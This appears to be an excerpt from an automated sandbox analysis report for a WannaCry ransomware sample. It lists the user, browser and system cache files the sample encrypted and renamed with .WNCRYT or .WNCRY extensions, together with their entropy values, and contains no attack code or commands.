              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99983996973Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99982398938Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99982493577Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99983253865Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99996595789Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99390075091Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRYT entropy: 7.99957246403Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT entropy: 7.99953815761Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT entropy: 7.99899626123Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRYT entropy: 7.99486309129Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRYT entropy: 7.99488676091Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99982678579Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRYT entropy: 7.99936109236Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst entropy: 7.99923285382Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRYT entropy: 7.9922177956Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRYT entropy: 7.99521947637Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRYT entropy: 7.9903807642Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRYT entropy: 7.99763430975Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRYT entropy: 7.99624977378Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRYT entropy: 7.99973382747Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRYT entropy: 7.99792319314Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRYT entropy: 7.99986403796Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRYT entropy: 7.99575075235Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRYT entropy: 7.99615316369Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\staticpwascripts-30998bff8f[1].js.WNCRYT entropy: 7.99033781663Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99987830596Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.9998740337Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\1Sd5265G8OlnRColAI8O_SxSQ1Q.br[1].js.WNCRYT entropy: 7.9987094026Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\1_gc11zDuaJOyBP7gyptBGdPRf4.br[1].js.WNCRYT entropy: 7.99697630682Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT entropy: 7.99579321527Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT entropy: 7.9928989519Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\6qhc82nhlRe74lC1CBjrzThsaXw.br[1].js.WNCRYT entropy: 7.99512173514Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT entropy: 7.99799090422Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.99873410208Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{40385465-94d7-4db6-a4cb-fc8229e20afa}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99485470804Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{494b20de-5fb0-48cf-ace0-4a90f11d53e1}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99495276282Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d82cf085-269f-405d-97fb-0fd4f9708b6f}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99490859453Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRYT entropy: 7.99988432536Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRYT entropy: 7.99946177844Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRYT entropy: 7.99931924001Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRYT entropy: 7.99973695738Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRYT entropy: 7.9962748574Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRYT entropy: 7.99784120017Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99903398033Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99916407002Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRY (copy) entropy: 7.99936109236Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy) entropy: 7.99799090422Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.99873410208Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{40385465-94d7-4db6-a4cb-fc8229e20afa}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99485470804Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{494b20de-5fb0-48cf-ace0-4a90f11d53e1}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99495276282Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d82cf085-269f-405d-97fb-0fd4f9708b6f}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99490859453Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRY (copy) entropy: 7.99988432536Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRY (copy) entropy: 7.99946177844Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRY (copy) entropy: 7.99931924001Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRY (copy) entropy: 7.99973695738Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRY (copy) entropy: 7.9962748574Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99784120017Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99903398033Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99916407002Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913551623871.txt.WNCRY (copy) entropy: 7.99827699961Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913644287936.txt.WNCRY (copy) entropy: 7.99866182586Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133556788209046880.txt.WNCRY (copy) entropy: 7.99849122671Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133556788503660237.txt.WNCRY (copy) entropy: 7.9984883625Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99975186377Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy) entropy: 7.9919612542Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRY (copy) entropy: 7.99981275091Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRY (copy) entropy: 7.99648727058Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY (copy) entropy: 7.99093301689Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRY (copy) entropy: 7.99300407594Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRY (copy) entropy: 7.99029303433Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRY (copy) entropy: 7.9921522433Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRY (copy) entropy: 7.99471300322Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRY (copy) entropy: 7.99274564856Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRY (copy) entropy: 7.99775739374Jump to dropped file
